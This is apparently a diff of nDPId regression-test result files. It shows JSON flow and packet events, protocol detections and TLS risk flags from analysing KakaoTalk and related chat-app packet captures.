+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":347,"total-skipped-flows":0,"total-l4-data-len":52012,"total-not-detected-flows":0,"total-guessed-flows":9,"total-detected-flows":29,"total-detection-updates":32,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":236,"global_ts_msec":1430069073299} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/KakaoTalk_talk.pcap.out b/test/results/KakaoTalk_talk.pcap.out index 7078dfca5..55c83f7d0 100644 --- a/test/results/KakaoTalk_talk.pcap.out +++ b/test/results/KakaoTalk_talk.pcap.out @@ -1,43 +1,43 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1430069140120} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="} -00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} -00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 